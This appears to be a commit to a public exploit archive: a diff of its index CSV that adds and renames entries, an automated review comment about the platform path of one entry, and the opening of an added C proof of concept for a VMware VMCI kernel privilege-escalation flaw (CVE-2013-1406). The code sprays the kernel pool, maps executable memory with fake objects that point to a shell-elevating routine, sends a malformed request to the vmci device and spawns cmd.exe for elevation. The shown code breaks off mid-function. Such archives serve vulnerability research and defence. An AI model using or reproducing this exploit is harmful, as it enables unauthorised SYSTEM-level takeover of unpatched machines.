DB: 2016-08-08

2 new exploits

VMWare OVF Tools - Format String (1)
VMware OVF Tools - Format String (1)

VMWare OVF Tools - Format String (2)
VMware OVF Tools - Format String (2)

VMWare - Setuid vmware-mount Unsafe popen(3)
VMware - Setuid vmware-mount Unsafe popen(3)

Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039)

VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept

VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)
VMware - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)

ntop 2.3 <= 2.5 - Multiple Vulnerabilities
ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities

NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution
NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution
Offensive Security 2016-08-08 05:05:38 +00:00
parent e161127711
commit dac3d3dad6
3 changed files with 509 additions and 6 deletions


@ -21617,7 +21617,7 @@ id,file,description,date,author,platform,type,port
24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0 24441,platforms/hardware/webapps/24441.txt,"Netgear SPH200D - Multiple Vulnerabilities",2013-01-31,m-1-k-3,hardware,webapps,0
24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php L param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0 24508,platforms/php/webapps/24508.txt,"Scripts Genie Gallery Personals (gallery.php L param) - SQL Injection",2013-02-17,3spi0n,php,webapps,0
24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0 24433,platforms/php/webapps/24433.txt,"php weby directory software 1.2 - Multiple Vulnerabilities",2013-01-28,AkaStep,php,webapps,0
24460,platforms/windows/remote/24460.rb,"VMWare OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0 24460,platforms/windows/remote/24460.rb,"VMware OVF Tools - Format String (1)",2013-02-06,Metasploit,windows,remote,0
24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0 24434,platforms/multiple/remote/24434.rb,"Ruby on Rails JSON Processor YAML Deserialization Code Execution",2013-01-29,Metasploit,multiple,remote,0
24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0 24435,platforms/hardware/webapps/24435.txt,"Fortinet FortiMail 400 IBE - Multiple Vulnerabilities",2013-01-29,Vulnerability-Lab,hardware,webapps,0
24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps,0 24436,platforms/php/webapps/24436.txt,"Kohana Framework 2.3.3 - Directory Traversal",2013-01-29,Vulnerability-Lab,php,webapps,0
@ -21640,7 +21640,7 @@ id,file,description,date,author,platform,type,port
24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0
24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0 24458,platforms/linux/local/24458.txt,"Oracle Automated Service Manager 1.3 - Installation Local Privilege Escalation",2013-02-05,"Larry W. Cashdollar",linux,local,0
24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0 24459,platforms/linux/local/24459.sh,"Linux Kernel 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure",2013-02-05,vladz,linux,local,0
24461,platforms/windows/remote/24461.rb,"VMWare OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0 24461,platforms/windows/remote/24461.rb,"VMware OVF Tools - Format String (2)",2013-02-12,Metasploit,windows,remote,0
24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0 24462,platforms/php/webapps/24462.txt,"Hiverr 2.2 - Multiple Vulnerabilities",2013-02-06,xStarCode,php,webapps,0
24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0 24463,platforms/windows/dos/24463.txt,"Cool PDF Reader 3.0.2.256 - Buffer Overflow",2013-02-07,"Chris Gabriel",windows,dos,0
24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0 24464,platforms/hardware/webapps/24464.txt,"Netgear DGN1000B - Multiple Vulnerabilities",2013-02-07,m-1-k-3,hardware,webapps,0
@ -25037,7 +25037,7 @@ id,file,description,date,author,platform,type,port
27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0 27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0
27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 list_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 list_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0
28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.php Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0 28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.php Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0
27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 27938,platforms/linux/local/27938.rb,"VMware - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0
27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,Metasploit,windows,remote,0 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,Metasploit,windows,remote,0
27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,Metasploit,windows,remote,0 27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,Metasploit,windows,remote,0
27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,Metasploit,php,remote,0 27941,platforms/php/remote/27941.rb,"SPIP connect Parameter PHP Injection",2013-08-29,Metasploit,php,remote,0
@ -36305,6 +36305,7 @@ id,file,description,date,author,platform,type,port
40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80
40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0 40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Local Root Exploit (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0
40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0
40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0
40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
40148,platforms/windows/local/40148.py,"MediaCoder 0.8.43.5852 - .m3u SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0 40148,platforms/windows/local/40148.py,"MediaCoder 0.8.43.5852 - .m3u SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0
@ -36322,10 +36323,11 @@ id,file,description,date,author,platform,type,port
40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443
40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000 40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post Auth Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80
40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept",2013-03-06,"Artem Shishkin",multiple,local,0
40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80
40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80
40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23 40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hardcoded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23
40169,platforms/linux/local/40169.txt,"VMWare - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0 40169,platforms/linux/local/40169.txt,"VMware - Setuid vmware-mount Popen lsb_release Privilege Escalation (VMSA-2013-0010)",2013-08-22,"Tavis Ormandy",linux,local,0
40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80
40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - (.pls) Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - (.pls) Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
@ -36349,7 +36351,7 @@ id,file,description,date,author,platform,type,port
40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0 40198,platforms/multiple/dos/40198.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - WSP Dissector Denial of Service",2016-08-03,"Chris Benedict",multiple,dos,0
40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0 40199,platforms/multiple/dos/40199.txt,"Wireshark 2.0.0 to 2.0.4_ 1.12.0 to 1.12.12 - RLC Dissector Denial of Service",2016-08-03,"Antti Levomäki",multiple,dos,0
40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0 40200,platforms/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices and NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote,0
40201,platforms/linux/remote/40201.txt,"ntop 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0 40201,platforms/linux/remote/40201.txt,"ntop/nbox 2.3 <= 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote,0
40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80 40202,platforms/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,php,webapps,80
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0 40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - (Connection Name) Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80 40204,platforms/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",php,webapps,80
@ -36361,6 +36363,6 @@ id,file,description,date,author,platform,type,port
40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80 40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80
40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80 40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80
40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80 40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80
40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - ShellShock Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80 40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80
40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80
40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80
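Review bot: The new 40164 row files the VMCI PoC under `platforms/multiple/local` with platform `multiple`, yet the added 40164.c is Win32-only code (`__stdcall`, `DeviceIoControl` on `\\.\vmci`, `GetVersion()` branches for XP/7/8), so `windows` appears to be the correct platform and path: `40164,platforms/windows/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - Proof of Concept",2013-03-06,"Artem Shishkin",windows,local,0`. Changing the row would have to go together with moving the file, and the column may reflect a deliberate "affected product runs on multiple platforms" convention, so confirm the index's convention before editing. The remaining lines of this section are description-only renames (VMWare→VMware, ntop→ntop/nbox, ShellShock parenthesised) and need nothing.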


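--- a/platforms/multiple/local/40164.c
+++ b/platforms/multiple/local/40164.c
@@ -0,0 +1,472 @@
+/*
+CVE-2013-1406 exploitation PoC
+by Artem Shishkin,
+Positive Research,
+Positive Technologies,
+02-2013
+*/
+void __stdcall FireShell(DWORD dwSomeParam)
+{
+EscalatePrivileges(hProcessToElevate);
+// Equate the stack and quit the cycle
+#ifndef _AMD64_
+__asm
+{
+pop ebx
+pop edi
+push 0xFFFFFFF8
+push 0xA010043
+}
+#endif
+}
+HANDLE LookupObjectHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, PVOID pObjectAddr, DWORD dwProcessID = 0)
+{
+HANDLE hResult = 0;
+DWORD dwLookupProcessID = dwProcessID;
+if (pHandleTable == NULL)
+{
+printf("Ain't funny\n");
+return 0;
+}
+if (dwLookupProcessID == 0)
+{
+dwLookupProcessID = GetCurrentProcessId();
+}
+for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
+{
+if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].Object == pObjectAddr))
+{
+hResult = pHandleTable->Handles[i].HandleValue;
+break;
+}
+}
+return hResult;
+}
+PVOID LookupObjectAddress(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
+{
+PVOID pResult = 0;
+DWORD dwLookupProcessID = dwProcessID;
+if (pHandleTable == NULL)
+{
+printf("Ain't funny\n");
+return 0;
+}
+if (dwLookupProcessID == 0)
+{
+dwLookupProcessID = GetCurrentProcessId();
+}
+for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
+{
+if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
+{
+pResult = (HANDLE)pHandleTable->Handles[i].Object;
+break;
+}
+}
+return pResult;
+}
+void CloseTableHandle(PSYSTEM_HANDLE_INFORMATION_EX pHandleTable, HANDLE hObject, DWORD dwProcessID = 0)
+{
+DWORD dwLookupProcessID = dwProcessID;
+if (pHandleTable == NULL)
+{
+printf("Ain't funny\n");
+return;
+}
+if (dwLookupProcessID == 0)
+{
+dwLookupProcessID = GetCurrentProcessId();
+}
+for (unsigned int i = 0; i < pHandleTable->NumberOfHandles; i++)
+{
+if ((pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwLookupProcessID) && (pHandleTable->Handles[i].HandleValue == hObject))
+{
+pHandleTable->Handles[i].Object = NULL;
+pHandleTable->Handles[i].HandleValue = NULL;
+break;
+}
+}
+return;
+}
+void PoolSpray()
+{
+// Init used native API function
+lpNtQuerySystemInformation NtQuerySystemInformation = (lpNtQuerySystemInformation)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
+if (NtQuerySystemInformation == NULL)
+{
+printf("Such a fail...\n");
+return;
+}
+// Determine object size
+// xp:
+//const DWORD_PTR dwSemaphoreSize = 0x38;
+// 7:
+//const DWORD_PTR dwSemaphoreSize = 0x48;
+DWORD_PTR dwSemaphoreSize = 0;
+if (LOBYTE(GetVersion()) == 5)
+{
+dwSemaphoreSize = 0x38;
+}
+else if (LOBYTE(GetVersion()) == 6)
+{
+dwSemaphoreSize = 0x48;
+}
+unsigned int cycleCount = 0;
+while (cycleCount < 50000)
+{
+HANDLE hTemp = CreateSemaphore(NULL, 0, 3, NULL);
+if (hTemp == NULL)
+{
+break;
+}
+++cycleCount;
+}
+printf("\t[+] Spawned lots of semaphores\n");
+printf("\t[.] Initing pool windows\n");
+Sleep(2000);
+DWORD dwNeeded = 4096;
+NTSTATUS status = 0xFFFFFFFF;
+PVOID pBuf = VirtualAlloc(NULL, 4096, MEM_COMMIT, PAGE_READWRITE);
+while (true)
+{
+status = NtQuerySystemInformation(SystemExtendedHandleInformation, pBuf, dwNeeded, NULL);
+if (status != STATUS_SUCCESS)
+{
+dwNeeded *= 2;
+VirtualFree(pBuf, 0, MEM_RELEASE);
+pBuf = VirtualAlloc(NULL, dwNeeded, MEM_COMMIT, PAGE_READWRITE);
+}
+else
+{
+break;
+}
+};
+HANDLE hHandlesToClose[0x30] = {0};
+DWORD dwCurPID = GetCurrentProcessId();
+PSYSTEM_HANDLE_INFORMATION_EX pHandleTable = (PSYSTEM_HANDLE_INFORMATION_EX)pBuf;
+for (ULONG i = 0; i < pHandleTable->NumberOfHandles; i++)
+{
+if (pHandleTable->Handles[i].UniqueProcessId == (HANDLE)dwCurPID)
+{
+DWORD_PTR dwTestObjAddr = (DWORD_PTR)pHandleTable->Handles[i].Object;
+DWORD_PTR dwTestHandleVal = (DWORD_PTR)pHandleTable->Handles[i].HandleValue;
+DWORD_PTR dwWindowAddress = 0;
+bool bPoolWindowFound = false;
+UINT iObjectsNeeded = 0;
+// Needed window size is vmci packet pool chunk size (0x218) divided by
+// Semaphore pool chunk size (dwSemaphoreSize)
+iObjectsNeeded = (0x218 / dwSemaphoreSize) + ((0x218 % dwSemaphoreSize != 0) ? 1 : 0);
+if (
+// Not on a page boundary
+((dwTestObjAddr & 0xFFF) != 0)
+&&
+// Doesn't cross page boundary
+(((dwTestObjAddr + 0x300) & 0xF000) == (dwTestObjAddr & 0xF000))
+)
+{
+// Check previous object for being our semaphore
+DWORD_PTR dwPrevObject = dwTestObjAddr - dwSemaphoreSize;
+if (LookupObjectHandle(pHandleTable, (PVOID)dwPrevObject) == NULL)
+{
+continue;
+}
+for (unsigned int j = 1; j < iObjectsNeeded; j++)
+{
+DWORD_PTR dwNextTestAddr = dwTestObjAddr + (j * dwSemaphoreSize);
+HANDLE hLookedUp = LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr);
+//printf("dwTestObjPtr = %08X, dwTestObjHandle = %08X\n", dwTestObjAddr, dwTestHandleVal);
+//printf("\tdwTestNeighbour = %08X\n", dwNextTestAddr);
+//printf("\tLooked up handle = %08X\n", hLookedUp);
+if (hLookedUp != NULL)
+{
+hHandlesToClose[j] = hLookedUp;
+if (j == iObjectsNeeded - 1)
+{
+// Now test the following object
+dwNextTestAddr = dwTestObjAddr + ((j + 1) * dwSemaphoreSize);
+if (LookupObjectHandle(pHandleTable, (PVOID)dwNextTestAddr) != NULL)
+{
+hHandlesToClose[0] = (HANDLE)dwTestHandleVal;
+bPoolWindowFound = true;
+dwWindowAddress = dwTestObjAddr;
+// Close handles to create a memory window
+for (int k = 0; k < iObjectsNeeded; k++)
+{
+if (hHandlesToClose[k] != NULL)
+{
+CloseHandle(hHandlesToClose[k]);
+CloseTableHandle(pHandleTable, hHandlesToClose[k]);
+}
+}
+}
+else
+{
+memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
+break;
+}
+}
+}
+else
+{
+memset(hHandlesToClose, 0, sizeof(hHandlesToClose));
+break;
+}
+}
+if (bPoolWindowFound)
+{
+printf("\t[+] Window found at %08X!\n", dwWindowAddress);
+}
+}
+}
+}
+VirtualFree(pBuf, 0, MEM_RELEASE);
+return;
+}
+void InitFakeBuf(PVOID pBuf, DWORD dwSize)
+{
+if (pBuf != NULL)
+{
+RtlFillMemory(pBuf, dwSize, 0x11);
+}
+return;
+}
+void PlaceFakeObjects(PVOID pBuf, DWORD dwSize, DWORD dwStep)
+{
+/*
+Previous chunk size will be always 0x43 and the pool index will be 0, so the last bytes will be 0x0043
+So, for every 0xXXXX0043 address we must suffice the following conditions:
+lea edx, [eax+38h]
+lock xadd [edx], ecx
+cmp ecx, 1
+Some sort of lock at [addr + 38] must be equal to 1. And
+call dword ptr [eax+0ACh]
+The call site is located at [addr + 0xAC]
+Also fake the object to be dereferenced at [addr + 0x100]
+*/
+if (pBuf != NULL)
+{
+for (PUCHAR iAddr = (PUCHAR)pBuf + 0x43; iAddr < (PUCHAR)pBuf + dwSize; iAddr = iAddr + dwStep)
+{
+PDWORD pLock = (PDWORD)(iAddr + 0x38);
+PDWORD_PTR pCallMeMayBe = (PDWORD_PTR)(iAddr + 0xAC);
+PDWORD_PTR pFakeDerefObj = (PDWORD_PTR)(iAddr + 0x100);
+*pLock = 1;
+*pCallMeMayBe = (DWORD_PTR)FireShell;
+*pFakeDerefObj = (DWORD_PTR)pBuf + 0x1000;
+}
+}
+return;
+}
+void PenetrateVMCI()
+{
+/*
+VMware Security Advisory
+Advisory ID: VMSA-2013-0002
+Synopsis: VMware ESX, Workstation, Fusion, and View VMCI privilege escalation vulnerability
+Issue date: 2013-02-07
+Updated on: 2013-02-07 (initial advisory)
+CVE numbers: CVE-2013-1406
+*/
+DWORD dwPidToElevate = 0;
+HANDLE hSuspThread = NULL;
+bool bXP = (LOBYTE(GetVersion()) == 5);
+bool b7 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 1));
+bool b8 = ((LOBYTE(GetVersion()) == 6) && (HIBYTE(LOWORD(GetVersion())) == 2));
+if (!InitKernelFuncs())
+{
+printf("[-] Like I don't know where the shellcode functions are\n");
+return;
+}
+if (bXP)
+{
+printf("[?] Who do we want to elevate?\n");
+scanf_s("%d", &dwPidToElevate);
+hProcessToElevate = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPidToElevate);
+if (hProcessToElevate == NULL)
+{
+printf("[-] This process doesn't want to be elevated\n");
+return;
+}
+}
+if (b7 || b8)
+{
+// We are unable to change an active process token on-the-fly,
+// so we create a custom shell suspended (Ionescu hack)
+STARTUPINFO si = {0};
+PROCESS_INFORMATION pi = {0};
+si.wShowWindow = TRUE;
+WCHAR cmdPath[MAX_PATH] = {0};
+GetSystemDirectory(cmdPath, MAX_PATH);
+wcscat_s(cmdPath, MAX_PATH, L"\\cmd.exe");
+if (CreateProcess(cmdPath, L"", NULL, NULL, FALSE, CREATE_SUSPENDED | CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi) == TRUE)
+{
+hProcessToElevate = pi.hProcess;
+hSuspThread = pi.hThread;
+}
+}
+HANDLE hVMCIDevice = CreateFile(L"\\\\.\\vmci", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
+if (hVMCIDevice != INVALID_HANDLE_VALUE)
+{
+UCHAR BadBuff[0x624] = {0};
+UCHAR retBuf[0x624] = {0};
+DWORD dwRet = 0;
+printf("[+] VMCI service found running\n");
+PVM_REQUEST pVmReq = (PVM_REQUEST)BadBuff;
+pVmReq->Header.RequestSize = 0xFFFFFFF0;
+PVOID pShellSprayBufStd = NULL;
+PVOID pShellSprayBufQtd = NULL;
+PVOID pShellSprayBufStd7 = NULL;
+PVOID pShellSprayBufQtd7 = NULL;
+PVOID pShellSprayBufChk8 = NULL;
+if ((b7) || (bXP) || (b8))
+{
+/*
+Significant bits of a PoolType of a chunk define the following regions:
+0x0A000000 - 0x0BFFFFFF - Standard chunk
+0x1A000000 - 0x1BFFFFFF - Quoted chunk
+0x0 - 0xFFFFFFFF - Free chunk - no idea
+Addon for Windows 7:
+Since PoolType flags have changed, and "In use flag" is now 0x2,
+define an additional region for Win7:
+0x04000000 - 0x06000000 - Standard chunk
+0x14000000 - 0x16000000 - Quoted chunk
+*/
+pShellSprayBufStd = VirtualAlloc((LPVOID)0xA000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+pShellSprayBufQtd = VirtualAlloc((LPVOID)0x1A000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+pShellSprayBufStd7 = VirtualAlloc((LPVOID)0x4000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+pShellSprayBufQtd7 = VirtualAlloc((LPVOID)0x14000000, 0x2000000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+if ((pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL) || (pShellSprayBufQtd == NULL))
+{
+printf("\t[-] Unable to map the needed memory regions, please try running the app again\n");
+CloseHandle(hVMCIDevice);
+return;
+}
+InitFakeBuf(pShellSprayBufStd, 0x2000000);
+InitFakeBuf(pShellSprayBufQtd, 0x2000000);
+InitFakeBuf(pShellSprayBufStd7, 0x2000000);
+InitFakeBuf(pShellSprayBufQtd7, 0x2000000);
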